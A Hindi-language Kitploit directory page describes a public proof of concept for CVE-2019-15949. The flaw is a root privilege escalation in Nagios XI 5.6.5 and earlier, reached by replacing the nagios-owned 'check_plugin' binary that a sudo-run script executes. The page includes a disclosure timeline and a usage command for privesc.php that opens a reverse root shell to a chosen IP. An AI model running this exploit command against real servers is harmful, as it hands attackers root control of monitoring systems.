Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
nagiosxi-root-rce-exploit — POC जो Nagios XI (5.6.5) में मौजूद एक भेद्यता का शोषण करके रूट शेल प्राप्त करता है | Kitploit
उपकरण/GitHubGitHub/jakgibb/nagiosxi-root-rce-exploit
विशेषाधिकार वृद्धिशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubjakgibb/nagiosxi-root-rce-exploit

nagiosxi-root-rce-exploit

POC जो Nagios XI (5.6.5) में मौजूद एक भेद्यता का शोषण करके रूट शेल प्राप्त करता है

रिपॉजिटरी देखें
1675 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

nagiosxi-root-exploit

अवलोकन

Nagios XI <= 5.6.5 में एक भेद्यता मौजूद है जो हमलावर को रूट विशेषाधिकार बढ़ाने के लिए RCE का उपयोग करने की अनुमति देती है।
इस एक्सप्लॉइट के लिए सर्वर तक 'nagios' उपयोगकर्ता के रूप में पहुँच आवश्यक है, या प्लगइन प्रबंधित करने की अनुमति के साथ वेब इंटरफ़ेस के माध्यम से CCM पहुँच आवश्यक है।

विवरण

getprofile.sh स्क्रिप्ट, जो सिस्टम प्रोफ़ाइल (profile.php?cmd=download) डाउनलोड करने से आहूत होती है, पासवर्ड-रहित sudo प्रविष्टि के माध्यम से रूट के रूप में निष्पादित होती है; स्क्रिप्ट 'check_plugin' निष्पादन योग्य चलाती है जो nagios उपयोगकर्ता के स्वामित्व में है। Nagios XI में प्लगइन संशोधित करने की अनुमति वाला लॉग-इन उपयोगकर्ता, या सर्वर पर 'nagios' उपयोगकर्ता, 'check_plugin' निष्पादन योग्य को संशोधित कर सकता है और रूट के रूप में निष्पादन योग्य दुर्भावनापूर्ण कमांड डाल सकता है।

POC

एक PHP POC विकसित किया गया है जो रिवर्स रूट शेल के परिणामस्वरूप पेलोड अपलोड करता है।
उपयोग:
php privesc.php --host=example.com --ssl=[true/false] --user=username --pass=password --reverseip=ip --reverseport=port

प्रकटीकरण

Nagios को रिपोर्ट किया गया: 29 जुलाई 2019
Nagios द्वारा पुष्टि की गई: 29 जुलाई 2019
संस्करण 5.6.6 में ठीक किया गया: 20 अगस्त 2019
CVE निर्धारित: 6 सितंबर 2019 (CVE-2019-15949 https://nvd.nist.gov/vuln/detail/CVE-2019-15949)

alt text

टूल डाउनलोड करें